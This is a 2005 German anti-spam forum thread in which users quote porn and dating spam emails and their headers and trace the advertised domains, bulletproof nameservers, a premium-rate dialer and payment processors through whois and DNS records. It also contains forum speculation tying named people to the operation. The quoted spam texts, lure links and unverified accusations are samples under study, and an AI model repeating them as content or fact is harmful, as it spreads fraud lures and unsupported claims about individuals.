xxx @web.de, xxx @web.de, xxx @web.de, xxx @web.de
Subject: Ich kann und du?
Date: Tue, 09 Aug 2005 xx:xx:xx -0700
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="--6533583527373108"
X-Priority: 3
X-MSMail-Priority: Normal
X-WEBDE-FORWARD: xxx @web.de -> xxx @gmx.net
X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
X-GMX-Antispam: 5 (Score=8.108; FORGED_YAHOO_RCVD MIME_BOUND_DD_DIGITS
MSGID_SPAM_CAPS MISSING_MIMEOLE)
X-GMX-UID: [UID filtered]

----6533583527373108
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Hallo,
ich mal wieder. Tut mir leID: [ID filtered]
aber ich hatte soviel zu tun.

Lohnt sich echt, habe noch nie so schnell jemanden kennen gelernt.

Und das andere ist auch echt der Oberhammer.

Seh es dir einfach mal an und du wirst begeistert sein


http://www.super-angebote. net/los

Also bis bald...

----6533583527373108--



http://www.super-angebote. net/los

redirects to:


http://www.europe-online-billing. com/?508915lmm0f65caf0a7d00afd2b87c028e88fe931l158243889
(Angebot: VersautesMoesenFleisch)




Domain name: super-angebote.net --->
58.20.160.34 ---> CNCGROUP-HN

Registrant Contact:
N/A
Pedro Gonzalez (poor [at] spamvictim.tld)
+506.8723819
Fax: +1.5555555555
Bario Escalan
San Jose, SA 1000
CR

Administrative Contact:
N/A
Pedro Gonzalez (poor [at] spamvictim.tld)
+506.8723819
Fax: +1.5555555555
Bario Escalan
San Jose, SA 1000
CR

Technical Contact:
N/A
Pedro Gonzalez (poor [at] spamvictim.tld)
+506.8723819
Fax: +1.5555555555
Bario Escalan
San Jose, SA 1000
CR

Billing Contact:
N/A
Pedro Gonzalez (poor [at] spamvictim.tld)
+506.8723819
Fax: +1.5555555555
Bario Escalan
San Jose, SA 1000
CR

Status: Locked ---> Enom

Name Servers:
ns1.abathost.info ---> 58.20.160.32 --->
CNCGROUP-HN
ns2.abathost.info ---> 58.20.160.33
ns3.abathost.info ---> 221.10.254.75 -->
CNCGROUP-SC
ns4.abathost.info ---> 221.10.254.37 -->
CNCGROUP-SC




Domain ID:D10540377-LRMS
Domain Name:ABATHOST.INFO
Created On:08-Jul-2005 xx:xx:xx UTC
Last Updated On:10-Aug-2005 xx:xx:xx UTC
Expiration Date:08-Jul-2006 xx:xx:xx UTC
Sponsoring Registrar:R126-LRMS
Status:ACTIVE
Status:OK
Registrant ID:C10902602-LRMS
Registrant Name:WhoisGuard Protected
Registrant Organization:WhoisGuard
Registrant Street1:8939 S. Sepulveda Blvd
Registrant Street2:8939 S. Sepulveda Blvd
Registrant City:Westchester
Registrant State/Province:CA
Registrant Postal Code:90045
Registrant Country:US
Registrant
Email:d22d8d39d06b4ac492a9d6d3b39429a0.protect [at] whoisguard.com
Admin ID:C10902602-LRMS
Admin Name:WhoisGuard Protected
Admin Organization:WhoisGuard
Admin Street1:8939 S. Sepulveda Blvd
Admin Street2:8939 S. Sepulveda Blvd
Admin City:Westchester
Admin State/Province:CA
Admin Postal Code:90045
Admin Country:US
Admin
Email:d22d8d39d06b4ac492a9d6d3b39429a0.protect [at] whoisguard.com
Billing ID:C10902602-LRMS
Billing Name:WhoisGuard Protected
Billing Organization:WhoisGuard
Billing Street1:8939 S. Sepulveda Blvd
Billing Street2:8939 S. Sepulveda Blvd
Billing City:Westchester
Billing State/Province:CA
Billing Postal Code:90045
Billing Country:US
Billing
Email:d22d8d39d06b4ac492a9d6d3b39429a0.protect [at] whoisguard.com
Tech ID:C10902602-LRMS
Tech Name:WhoisGuard Protected
Tech Organization:WhoisGuard
Tech Street1:8939 S. Sepulveda Blvd
Tech Street2:8939 S. Sepulveda Blvd
Tech City:Westchester
Tech State/Province:CA
Tech Postal Code:90045
Tech Country:US
Tech
Email:d22d8d39d06b4ac492a9d6d3b39429a0.protect [at] whoisguard.com
Name Server:NS1.ABATHOST.INFO
Name Server:NS2.ABATHOST.INFO
Name Server:NS3.ABATHOST.INFO
Name Server:NS4.ABATHOST.INFO



Unlisted-Whois.com Protection Service
P.O. Box 229
Margaretville, NY 12455
US

Domain Name: EUROPE-ONLINE-BILLING.COM --->
212.112.210.7 ---> ip4 GmbH, Flensburg

Administrative Contact -
Unlisted-Whois.com, LLC Ref# 394282 -
sh5k93qvr8nr8js [at] brprivatewhois.com
Unlisted-Whois.com Protection Service
P.O. Box 229
Margaretville, NY 12455
US
Phone - 4107353410
Fax - 4107353433
Technical Contact -
Unlisted-Whois.com, LLC Ref# 394282 -
w4farc60tg9c97 [at] brprivatewhois.com
Unlisted-Whois.com Protection Service
P.O. Box 229
Margaretville, NY 12455
US
Phone - 4107353410
Fax - 4107353433
Billing Contact -
Unlisted-Whois.com, LLC Ref# 394282 -
xm3huhsu3hh6yw [at] brprivatewhois.com
Unlisted-Whois.com Protection Service
P.O. Box 229
Margaretville, NY 12455
US
Phone - 004107353410
Fax - 4107353433

Record updated date - 2005-07-11 xx:xx:xx
Record created date - 2005-07-11
Record expiring on - 2006-07-11
Database last updated on - 2005-08-10 xx:xx:xx
EST

Domain servers in listed order:

DNS1.DEDICATEDNS.COM 65.109.255.100
DNS2.DEDICATEDNS.COM 206.16.197.8




Ref: SBL29600

58.20.160.0/24 is listed on the
Spamhaus Block List (SBL)

05-Aug-2005 14:28 GMT | SR02

Dirty Block:
incredible-action.com (porn spam)

Now hosting Soloway in here:
SBL29864

Subject: sexually explicit

(written in windows-1251 charset)

Return-Path:
<newgroup [at] bkkmail.com>



221.10.254.37 - IP hosts 1 Total Domains ...
Showing 1 - 1 out of 1

Domain Name
1 CBIDEVELOPER.COM.

sis
10.08.2005, 22:15
Das sieht mir eher nach zwei Wochen Spammer-Urlaub aus. Pünktlich am Montag ging es auch bei mir wieder los (Absender wg. Verdacht auf OptIn geändert):


Return-Path: <0q1f2k3z4n5z [at] yahoo.com>
Received: from [61.39.28.137] (helo=217.72.192.149)
by mx29.web.de with smtp (WEB.DE 4.105 #297)
ID: [ID filtered]
Received: from 150.77.28.128 by 61.39.28.137; Wed, 10 Aug 2005 xx:xx:xx +0400
Message-ID: [ID filtered]
From: "..." <0q1f2k3z4n5z [at] yahoo.com>
Reply-To: "..." <0q1f2k3z4n5z [at] yahoo.com>
To: <...>
Subject: Die Bilder sind fertig
Date: Tue, 09 Aug 2005 xx:xx:xx +0100
Return-Path: <0h1o2s [at] yahoo.com>
Received: from [61.39.28.137] (helo=217.72.192.149)
by mx31.web.de with smtp (WEB.DE 4.105 #297)
ID: [ID filtered]
Received: from 12.232.252.201 by 61.39.28.137; Mon, 08 Aug 2005 xx:xx:xx -0200
Message-ID: [ID filtered]
From: "..." <0h1o2s [at] yahoo.com>
Reply-To: "..." <0h1o2s [at] yahoo.com>
To: <...>
Subject: wollen wir das jetzt machen?
Date: Mon, 08 Aug 2005 xx:xx:xx -0500

sis
10.08.2005, 23:28
Da hat unser kleines dummes Spammerlein mit der 61.145.70.50 eine IP-Adresse ausgewählt, die von einem ganz kleinen chinesischen Provider benutzt wird (besitzt nur vier Adressen). Mal schauen, ob da nicht was zu machen ist:

inetnum: 61.145.70.48 - 61.145.70.51
netname: HECHENG-JSZHL-INTERNET-SERVE-DEPA
descr: HECHENG JISUZHILU INTERNET SERVE DEPARTMENT
country: CN
admin-c: ZZ467-AP
tech-c: ZZ467-AP
status: ASSIGNED NON-PORTABLE
changed: ipadm @ gddc.com.cn 20031203
mnt-by: MAINT-CHINANET-GD
source: APNIC

person: ZHUANG ZAIWEN
nic-hdl: ZZ467-AP
e-mail: ipuser @ gddc.com.cn
address: CINEMA,WENCHANG RO.,GAOMING
country: CN
phone: +86-757-8888449
fax-no: +86-757-8888449
changed: ipadm @ gddc.com.cn 20031203
mnt-by: MAINT-CHINANET-GD
source: APNIC


Return-Path: <0g1y2x3r4 [at] yahoo.com>
Received: from [61.145.70.50] (helo=217.72.192.188)
by mx33.web.de with smtp (WEB.DE 4.105 #297)
ID: [ID filtered]
Received: from 86.113.88.245 by 61.145.70.50; Wed, 10 Aug 2005 xx:xx:xx -0100
From: "..." <0g1y2x3r4 [at] yahoo.com>
Reply-To: "..." <0g1y2x3r4 [at] yahoo.com>
To: <...>
Subject: die bestellten Zugangsdaten
Date: Wed, 10 Aug 2005 xx:xx:xx -0500
X-Mailer: Microsoft Outlook Express 5.00.2919.6700

trekkie
10.08.2005, 23:32
Da hat unser kleines dummes Spammerlein mit der 61.145.70.50 eine IP-Adresse ausgewählt, die von einem ganz kleinen chinesischen Provider benutzt wird (besitzt nur vier Adressen).

Daß der überhaupt geroutet wird...

Dzdz...

:skull:

sis
11.08.2005, 00:09
Die vom Cyberservice-Spammer konsequent seit 14.06.2005 angegebenen Absender (... [at] Yahoo.com) existieren nicht und könnten durchaus zur Adressverifikation der in diesem Forum geposteten Header dienen.

Nicht zu erwähnen, dass dieser minderwertige Spammer hier natürlich mitliest. Aber jeder macht mal einen Fehler :p

kjz1
18.08.2005, 22:09
Und heute wieder. Spamvertized wurde wieder:

www.super-angebote. net/los und
www.super-angebote. net/hand

super-angebote.net ---> 58.20.160.20 ---> CNCGROUP-HN

mit den Nameservern:

ns1.abathost.info ---> 58.20.160.32 ---> CNCGROUP-HN
ns1.zarkon.info ---> 58.20.160.21 ---> CNCGROUP-HN
ns2.zarkon.info ---> 58.20.160.22 ---> CNCGROUP-HN
ns3.abathost.info ---> 221.10.254.75 --> CNCGROUP-SC
ns3.zarkon.info ---> 221.10.254.37 --> CNCGROUP-SC

Soweit kaum Neues. Interessant aber der Spamhaus-Eintrag zu
abathost:

Ref: SBL28340

221.10.254.0/25 is listed on the Spamhaus Block List (SBL)

17-Aug-2005 14:14 GMT | SR14

ns3.abathost.info/ns4.abathost.info

2005-08-15: Spammers are back, this time Kuvayev & Co, so this block
is probably run by a rogue agent.

Also hat Leo selbst hier seine schmutzigen Finger im Spiel und macht 'Bulletproof-Auftragshosting' für deutsche Spammer?

- kjz

Goofy
18.08.2005, 22:20
Cyberservices hat bereits bei Mailtrain gehostet.
Viele Mailtrain-Bulletproof-Server haben aber momentan ganz bedauerliche dns-timeout-Probleme.
Möglich also, dass man es jetzt bei einem anderen Hoster probiert, und dass Kuvayev jetzt auch in bulletproof-hosting macht. Der scheint immer vielseitiger zu werden.
Aber ganz "bulletproof" scheinen seine dns-Server auch nicht zu sein. Man wird sehen... :D

dk99hi
19.08.2005, 10:41
From - Fri Aug 19 xx:xx:xx 2005
Return-Path: <upyjk [at] fusemail.com>
X-Flags: 1000
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: (qmail invoked by alias); 19 Aug 2005 xx:xx:xx -0000
Received: from unknown (HELO fusemail.com) [200.203.218.20]
by mx0.gmx.net (mx026) with SMTP; 19 Aug 2005 xx:xx:xx +0200
Message-ID: [ID filtered]
Reply-To: "Jim Taylor" <upyjk [at] fusemail.com>
From: "Dad" <upyjk [at] fusemail.com>
To: <poor [at] spamvictim.tld>
Cc: <1x [at] gmx.de>
Subject: Über 500 ErotikDVD's zum runterladen
Date: Fri, 19 Aug 2005 xx:xx:xx -1000
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_E60_5557_F9A983B4.F5B68290"
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6900
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6900
X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
X-GMX-Antispam: 3 (No reverse DNS record)
X-GMX-UID: [UID filtered]

This is a multi-part message in MIME format.

Beworben: http://www.freeway.cc/de/index.html


Wenn ich mich durchklicke bekomme ich z.B. einen Dialer mit folgenden
Informationen:

Version: 9.0.1.2
Hashwert: 97C1E11A30E64672BC92B2778EB02E0D6F822DA0
Ruf-Nr: 090090001704 Zugang nur aus dem deutschen Festnetz
Dateiname: member.exe

Inhalteanbieter: Cyberservices B.V.
Monique Darda
Keizersgracht 62-64
1015 CS Amsterdam
Niederlande


Das Mistteil will 29,95 Euro/Anruf :skull:

Fidul
19.08.2005, 16:16
Mach dir doch mal den Spaß und wirf diese Dialer-Daten in die Suchmaschine (http://app.bundesnetzagentur.de/Dialer2005/Default.aspx) der Bundesnetzagentur ein. Na sowas! :lil:

Sirius
19.08.2005, 16:28
Hallo.

Da stehen einige interessante Namen: http://tinyurl.com/dw6pu. Sind die schon irgendwo aufgefallen?

BTW: Entweder man kann jetzt den Pr0n-Sch*ß gratis gucken, oder die Nummer ist nicht mehr geschaltet. Ich habe aber keine Lust, das auszuprobieren. :sick:

Grüße

Fidul
19.08.2005, 17:26
Da stehen einige interessante Namen: http://tinyurl.com/dw6pu. Sind die schon irgendwo aufgefallen?
Der Link geht nicht, da die Behörde ihr System komplett umgestellt hat und keinen direkten Link zum Abfrageresultat mehr ermöglicht. :sick:

Aber die Namen und Firmen sind wirklich bereits bekannt. Schau doch mal nebenan (http://forum.computerbetrug.de/) nach und suche ein bischen. Eine Beschwerde ging bereits vor einigen Tagen raus, da dieser nette Dialer auch auf anderen Seiten dieser Bande verwendet wird. Das könnte Ärger geben.

dk99hi
19.08.2005, 17:44
Mach dir doch mal den Spaß und wirf diese Dialer-Daten in die Suchmaschine (http://app.bundesnetzagentur.de/Dialer2005/Default.aspx) der Bundesnetzagentur ein. Na sowas! :lil:


Dieser Dialer darf gemäß der Verfügung 4/2005 seit dem 17.06.2005 nicht mehr verwendet werden.

Oh, ein Dummspammer. Damit lässt sich doch kein Geld verdienen. :D

Sirius
19.08.2005, 18:28
Hallo.


Der Link geht nicht, da die Behörde ihr System komplett umgestellt hat und keinen direkten Link zum Abfrageresultat mehr ermöglicht. Danke für den Hinweis! (Mein Browser-Cache zeigt den Link noch an).

Selbst ein Link auf das leere Eingabe-Formular funktioniert nicht sofort - man benötigt erst einen hunderte von Bytes langen Schlüssel.

Grüße

kjz1
19.08.2005, 21:04
Cyberservices hat bereits bei Mailtrain gehostet.
Viele Mailtrain-Bulletproof-Server haben aber momentan ganz bedauerliche dns-timeout-Probleme.
Möglich also, dass man es jetzt bei einem anderen Hoster probiert, und dass Kuvayev jetzt auch in bulletproof-hosting macht. Der scheint immer vielseitiger zu werden.
Aber ganz "bulletproof" scheinen seine dns-Server auch nicht zu sein. Man wird sehen... :D

Ja, das Hosting bei Mailtrain habe ich auch vermerkt. Der Wechsel ist aber auch ein Indiz dafür, dass es sich nicht um einen 'Feierabend-Dummspammer', sondern um einen Profi handelt, der haargenau weiss, was er (verbotenes) tut. Rechtlich gesehen ist also Vorsatz zu vermuten. Und Leo macht sowieso jedes krumme Online-Ding, mit dem sich ein paar Kröten verdienen lassen. Und wie bereits weiter unten angedeutet, dürfte sich auch die RegTP für diesen Dialer interessieren.

- kjz

kjz1
23.08.2005, 21:21
Heute wieder eingetroffen von

Received: from unknown (HELO 222.136.213.243) [222.136.213.243] ---> CNCGROUP-HA by mx0.gmx.net (mx045) with SMTP; 23 Aug 2005 xx:xx:xx +0200

bespamt wurde:

Domain Name:FINANZTIPP.ORG ---> 222.208.183.18 ---> CHINANET-SC
Name Server:NS1.WESTERFIELDBK.ORG ---> 222.208.183.18 ---> CHINANET-SC
Name Server:NS1.SDHOST.BIZ -> 222.174.34.158 ---> CHINATELECOM-SD
Name Server:NS2.M68.BIZ -> 61.233.40.139 ---> CRTC

Ist natürlich wieder über Mailtrain gehostet. Im Whois finden sich folgende Kontaktadressen: daniel [at] sv-luka.org, bup88biz [at] yahoo.com. Wenn man nach diese Adressen (und buphost@) sucht, wird man sehen, dass diese altbekannt sind. Auch hier wieder das Altm....?

- kjz

dk99hi
24.08.2005, 11:03
Ich hab mich mal mit "Random-Daten" angemeldet.

Falls ich Fragen haben sollte muss ich mich an office [at] finanztipp.org
wenden :D

Abrechnung erfolgt über
https://secureshop.bsc.lv/ecomm/ClientHandler?trans_id=xxxxx

Ist das nee FAKE-Bank?

kjz1
24.08.2005, 12:00
Ist das nee FAKE-Bank?

Ich sehe da auch nur einen sehr dubiosen Kreditkarten-Prozessor in Litauen.

- kjz

kjz1
24.08.2005, 21:53
Heute wieder frisch vom Altm....:

Zombie: pool-151-198-251-106.nwrk.east.verizon.net

Beworben: www.funworld2005. com/los

Whois:
Registrant Contact:
Private
Peter Stone (stoni [at] online.ie)
+41.78867
Fax: +1.5555555555
Ruda 138
Horni Mesto, ME 79344
CZ

(BTW: Wie kann ein Registrar nur so hanebüchen gefälschte Adressdaten akzeptieren?)

Nameserver:

ns1.zarkon.info ---> 61.235.117.166 ---> CRGdSzS/CRTC
ns2.zarkon.info ---> 61.235.117.167
ns3.zarkon.info ---> 61.235.117.166
ns4.zarkon.info ---> 221.10.254.75 ---> CNCGROUP-SC

Also bei den 'obermerkbefreiten' Chinesen CNC und CRTC (chines. Eisenbahn).
(BTW: Geht es der chinesischen Eisenbahn so schlecht, dass die sich ein gewaltiges Zubrot durch breitgestreutes Spammer-Hosting verdienen muss; oder bessern da einige Eisenbahner illegal ihre Einkünfte auf?)

weitergeleitet wird auf:

http://www3.europe-internet-billing. com/?s=.....

Das ist die ip4 GmbH in Flensburg. Geht es ip4 so schlecht, dass die auf Spammer als Geschäftspartner angewiesen sind?

- kjz

Goofy
25.08.2005, 20:45
weitergeleitet wird auf:

http://www3.europe-internet-billing. com/?s=.....


Komisch. :lil:
Vorhin ging´s noch, jetzt auf einmal löst das DNS die Billing-Domain nicht mehr auf.
Was da bloss wieder los ist?
Also - so wird das nix mit dem Billing... (http://www.dnsstuff.com/tools/lookup.ch?name=europe-internet-billing.com&type=A)
:D

kjz1
25.08.2005, 21:19
Na ja, Spammy hat aber schon reagiert:

soeben frisch eingetroffen vom Zombie: 65.78.196.200 (WVFIBERNET-NET6).
Diesmal wird (oh Wunder.....) keine Domain mehr beworben (kriegt Spammy da nichts mehr ans Laufen....), sondern mit üblichem Text nur noch eine Freemailer-Adresse: spasshaben @ lycos.com. Na, Spammy wird sich sicher über zahlreiche 'Spasskontakte' freuen...

- kjz

kjz1
11.09.2005, 21:12
Heute wieder frisch aufgeschlagen, beworben wurde:

DIE FKK-DATENBANK IST DA

Der Sommer steht vor der Tuer und da gibt es auch
bei uns mal wieder eine einmalige Neuerung:
http://www. neue-hits. info/fkk
DIE FKK-DATENBANK - Strand, Sonne und nackte Koerper-
hier kannst Du das machen was man sich sonst am
Strand nicht traut - ungeniert gaffen, Titten
angucken und sich die Koerper der anderen Frauen mal
ganz genau vornehmen.
So etwas wie das gibt es in dieser Fuelle nirgends
anders!!!
Dazu natuerlich Cams und Videos + Bilder

http://www. neue-hits.info/fkk/
****************************************************



Es gab einige Problem mit dem austragen. Bitte machen sie
Dies erneut. Eine Austragung erfolgt dann auch!!!

http://www. neue-hits. info/out.php



Domain ID:D10805604-LRMS
Domain Name:NEUE-HITS.INFO ---> 221.10.201.165 ---> CNCGROUP-SC
Created On:06-Sep-2005 xx:xx:xx UTC
Last Updated On:07-Sep-2005 xx:xx:xx UTC
Expiration Date:06-Sep-2006 xx:xx:xx UTC
Sponsoring Registrar:R126-LRMS
Status:ACTIVE
Status:OK
Registrant ID:C11237384-LRMS
Registrant Name:Alexander Balzaq
Registrant Organization:Balzaq Communique
Registrant Street1:13/15, Avenue Franklin D. Roos
Registrant Street2:evelt
Registrant City:Paris
Registrant State/Province:PA
Registrant Postal Code:75008
Registrant Country:FR
Registrant Email:cz_online [at] stalag13.com
Admin ID:C11237387-LRMS
Admin Name:Alexander Balzaq
Admin Organization:Balzaq Communique
Admin Street1:13/15, Avenue Franklin D. Roos
Admin Street2:evelt
Admin City:Paris
Admin State/Province:PA
Admin Postal Code:75008
Admin Country:FR
Admin Email:cz_online [at] stalag13.com
Billing ID:C11237386-LRMS
Billing Name:Alexander Balzaq
Billing Organization:Balzaq Communique
Billing Street1:13/15, Avenue Franklin D. Roos
Billing Street2:evelt
Billing City:Paris
Billing State/Province:PA
Billing Postal Code:75008
Billing Country:FR
Billing Email:cz_online [at] stalag13.com
Tech ID:C11237385-LRMS
Tech Name:Alexander Balzaq
Tech Organization:Balzaq Communique
Tech Street1:13/15, Avenue Franklin D. Roos
Tech Street2:evelt
Tech City:Paris
Tech State/Province:PA
Tech Postal Code:75008
Tech Country:FR
Tech Email:cz_online [at] stalag13.com
Name Server:NS3.MAIL18.BIZ ---> 220.164.144.187 ---> CHINANET-YN
Name Server:NS1.HOSTQHR.BIZ

Registrar: R126-LRMS

Das ganze lief wieder über Mailtrain. 'Offiziell' sind beide Nameserver schon tot (No A records), werden aber anscheinend noch per DNS-Spoofing 'reanimiert'.

- kjz

Catcher
11.09.2005, 23:55
Ohne Worte

kjz1
12.09.2005, 19:00
Heute wieder frisch von das Altm... eingetroffen:

Domain Name:SPASS2005.INFO ---> 221.4.179.234 --->
CNCGROUP-GD
Created On:24-Aug-2005 xx:xx:xx UTC
Last Updated On:04-Sep-2005 xx:xx:xx UTC
Expiration Date:24-Aug-2006 xx:xx:xx UTC
Sponsoring Registrar:R126-LRMS
Status:ACTIVE
Status:OK
Registrant ID:C11068721-LRMS
Registrant Name:Peter Stone
Registrant Organization:Private
Registrant Street1:Ruda 138
Registrant City:Horni Mesto
Registrant State/Province:ME
Registrant Postal Code:79344
Registrant Country:CZ
Registrant Email:poor [at] spamvictim.tld

mit den Nameservern:

Name Server:DNS1.KVAST.INFO ---> 61.235.117.167 ---> China Railcom Guangdong Shenzhen Subbranch
Name Server:DNS2.KVAST.INFO ---> 221.4.179.234 ---> CNCGROUP-GD
Name Server:DNS3.KVAST.INFO ---> 221.4.179.236
Name Server:DNS4.KVAST.INFO ---> 221.4.179.234

Domain ID:D10799515-LRMS
Domain Name:KVAST.INFO
Created On:04-Sep-2005 xx:xx:xx UTC
Last Updated On:12-Sep-2005 xx:xx:xx UTC
Expiration Date:04-Sep-2006 xx:xx:xx UTC
Sponsoring Registrar:R126-LRMS
Status:ACTIVE
Status:OK
Registrant ID:C11371801-LRMS
Registrant Name:WhoisGuard Protected
Registrant Organization:WhoisGuard
Registrant Street1:8939 S. Sepulveda Blvd
Registrant Street2:8939 S. Sepulveda Blvd
Registrant City:Westchester
Registrant State/Province:CA
Registrant Postal Code:90045
Registrant Country:US

Die IPs der Nameserver haben laut Spamhaus Verbindung zu: Taiwan Media Ltd. Zur Erinnerung, das sind die, die uns seit Monaten mit Rolex Spam (Online-Replica-Store) beglücken und bevorzugt bei Joker registrieren. Zu den 'Taiwanern' meint Spamhaus: 'Closely tied to/same as Leo Kuvayev and his "BadCow" organized crime network.' Also auch hier ist Leo nicht weit ums Eck.

- kjz

kjz1
14.09.2005, 11:50
Heute wieder eingetroffen von:

sarahure.plus.com [84.92.57.140]

Domain Name:NEUE-HITS.INFO ---> 221.10.201.165 ---> CNCGROUP-SC
Created On:06-Sep-2005 xx:xx:xx UTC
Last Updated On:14-Sep-2005 xx:xx:xx UTC
Expiration Date:06-Sep-2006 xx:xx:xx UTC
Sponsoring Registrar:R126-LRMS
Status:ACTIVE
Status:OK
Registrant ID:C11237384-LRMS
Registrant Name:Alexander Balzaq
Registrant Organization:Balzaq Communique
Registrant Street1:13/15, Avenue Franklin D. Roos
Registrant Street2:evelt
Registrant City:Paris
Registrant State/Province:PA
Registrant Postal Code:75008
Registrant Country:FR
Registrant Email:poor [at] spamvictim.tld
Admin ID:C11237387-LRMS

Nameserver:

Name Server:NS3.MAIL18.BIZ ---> eNom/Domain Status:clientHold
Name Server:NS1.XZDNS.BIZ ---> eNom/Domain Status:clientHold
Name Server:NS1.HOSTQHR.BIZ -> eNom/Domain Status:clientHold
Name Server:NS2.SDHOST.BIZ ---> 220.164.144.187 --->
CHINANET-YN / eNom

Von dieser scheint nur noch letzter aktiv zu sein.

Redirect geht zu:

http://digitalpayment. de/paygate/?wm=4327&ag=206&lg=de&py=13&sc=2&dp=1&do=141
---> 83.64.251.66 ---> Maxolution/Inode (AT)

Also wieder die altbekannten Mannen aus Stockern in AT. Haben die eigentlich bei Inode einen 'pink contract' oder warum sind die dort nicht schon längst abgeklemmt?

- kjz

doc33
14.09.2005, 13:26
Ich habe vor einiger Zeit schon an Inode geschrieben diesbezüglich, als Antwort kam nur die bitte das ich Inode den Header der Spam Emails übermitteln solle, logischerweise hat das wiedermal nichts gebracht weil die nicht über ihre eigenen Server spammen und der Rest interessiert Inode einfach nicht.

kjz1
16.09.2005, 14:16
Heute wieder pünktlich zum Wochenende der nächste Spam:

Gesendet vom Zombie: adsl-68-127-72-43.dsl.lsan03.pacbell.net

Beworben wurde (IP von Taiwan Media, also dem hier altbekannten Leo):

Domain Name:SPASSKONTAKTE.INFO ---> 61.235.117.166 --->
China Railcom Guangdong Shenzhen Subbranch
Created On:14-Sep-2005 xx:xx:xx UTC
Last Updated On:14-Sep-2005 xx:xx:xx UTC
Expiration Date:14-Sep-2006 xx:xx:xx UTC
Sponsoring Registrar:R126-LRMS
Status:ACTIVE
Status:OK
Registrant ID:C11402378-LRMS
Registrant Name:Peter Stone
Registrant Organization:Private
Registrant Street1:Ruda 138
Registrant City:Horni Mesto
Registrant State/Province:ME
Registrant Postal Code:79344
Registrant Country:CZ
Registrant Email:poor [at] spamvictim.tld

mit den Nameservern:

spasskontakte.info. A IN 600 61.235.117.166

spasskontakte.info. NS IN 600 dns2.kvast.info.

spasskontakte.info. NS IN 600 dns3.kvast.info.

spasskontakte.info. NS IN 600 dns4.kvast.info.

spasskontakte.info. NS IN 600 dns1.kvast.info.

dns1.kvast.info. A IN 600 221.4.179.236 ---> CNCGROUP-GD

dns2.kvast.info. A IN 600 61.235.117.166 ---> China Railcom Guangdong

dns3.kvast.info. A IN 600 221.4.179.236

dns4.kvast.info. A IN 600 61.235.117.166 ---> China Railcom Guangdong


was dann letztendlich umleitete auf:

http://www3. europe-internet-billing.com/?508915lmm0f65caf0a7d00afd2b87c028e88fe931l158243889
---> 212.112.210.7 ---> ip4 GmbH, Flensburg/internetproviding.de

Was mich nur wundert, dass die ip4 GMBH sich so bereitwillig zum Spammer-Bezahlsystem missbrauchen läßt. Sitzen die mit Spammern in einem Boot oder hapert es da an Kontrolle, wer denn diesen ePay-Dienst missbraucht?

- kjz

sis
16.09.2005, 14:34
Derselbe Kram (alle Daten außer Datum und IP-Adresse anonymisiert):
Return-Path: <@online.ie>
Received: from [68.118.98.134] (helo=68-118-98-134.dhcp.kgpt.tn.charter.com)
by mx33.web.de with smtp (WEB.DE 4.105 #297)
ID: [ID filtered]
Received: from 129.173.28.96 by 68.118.98.134; Fri, 16 Sep 2005 xx:xx:xx +0400
Message-ID: [ID filtered]
From: "..." <@online.ie>
Reply-To: "..." <@online.ie>
To: <>
Cc: <>
Subject: RE: Wochenende
Date: Fri, 16 Sep 2005 xx:xx:xx +0500
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)

gation
17.09.2005, 13:03
Was mich nur wundert, dass die ip4 GMBH sich so bereitwillig zum Spammer-Bezahlsystem missbrauchen läßt. Sitzen die mit Spammern in einem Boot oder hapert es da an Kontrolle, wer denn diesen ePay-Dienst missbraucht?
- kjz
ist ip4 nicht M-P M aus Flensburg / Harrislee? Vielleicht hat man einfach "no respect"? Führt(e) die memberar**.cc-IP nicht auch (mal?) dort hin? Führte das nicht zu einer dänischen Schule in Husby? Mein Gedächtnis ist so schlecht... Da war doch auch noch ein Sv* Gr*, der zu diesem M-P M gehört hatte? Der namensgleich ist mit einem Sv* Gr*, der noch ganz andere Dinge tut.
Ich müsste das mal nachlesen, aber vielleicht gibt mir hier jemand einen kleinen Hinweis, dass das alles schon en detail recherchiert ist. Dann kann ich mir das sparen und es bei diesen Hinweisen belassen.
Gruß!
gation/sig

Sirius
17.09.2005, 13:42
Du meinst den Rechtsaußen der Mannschaft?

kjz1
21.09.2005, 12:49
Heute wieder von einem Zombie aus Malaysia: [203.121.63.177] ---> TIMETELEKOM, MY

Beworben wurde wieder:

Domain Name:SPASSKONTAKTE. INFO ---> 221.4.179.234 ---> CNCGROUP-GD

mit den Nameservern:

DNS1.KVAST.INFO ---> 61.235.117.167 ---> CRGdSzS/CRTC
DNS2.KVAST.INFO ---> 61.235.117.169 ---> CRTC
DNS3.KAVASTST.INFO ---> 221.4.179.236 ---> CNCGROUP-GD
DNS4.KVAST.INFO ---> 221.4.179.234 ---> CNCGROUP-GD

Bezahlung wieder über IP4 in Flensburg:

http://www3.europe-internet-billing. com/?508915lmm0f65caf0a7d00afd2b87c028e88fe931l158243889
---> 212.112.210.7 ---> ip4 GmbH, Flensburg

- kjz

Goofy
21.09.2005, 19:09
Europe-internet-billing.com ist momentan im DNS nicht erreichbar.

kjz1
30.09.2005, 11:44
Heute wieder frisch eingetroffen. In bester Gemeinschaft mit Leo und den bekannten Gebrüdern aus Stockach in AT.

- kjz

<snip>

From myhgmh @online.ie Fri Sep 30 xx:xx:xx 2005
Return-Path: <myhgmh [at] online.ie>
X-Flags: 1001
Delivered-To: GMX delivery to xxx @gmx.net
Received: (qmail invoked by alias); 30 Sep 2005 xx:xx:xx -0000
Received: from mx22.web.de (EHLO mx22.web.de) [217.72.192.132]
by mx0.gmx.net (mx004) with SMTP; 30 Sep 2005 xx:xx:xx +0200
Received: from [219.233.33.250] (helo=217.72.192.149) ---> Shanghai
Cable Network Co., Ltd.
by mx22.web.de with smtp (WEB.DE 4.105 #323)
ID: [ID filtered]
Received: from 40.168.86.63 by 219.233.33.250; Fri, 30 Sep 2005 xx:xx:xx
-0100
Message-ID: [ID filtered]
From: "Rodolfo Carroll" <myhgmh @online.ie>
Reply-To: "Rodolfo Carroll" <myhgmh @online.ie>
To: xxx @web.de, xxx @web.de, xxx @web.de, xxx @web.de
Subject: wie versprochen
Date: Fri, 30 Sep 2005 xx:xx:xx +0200
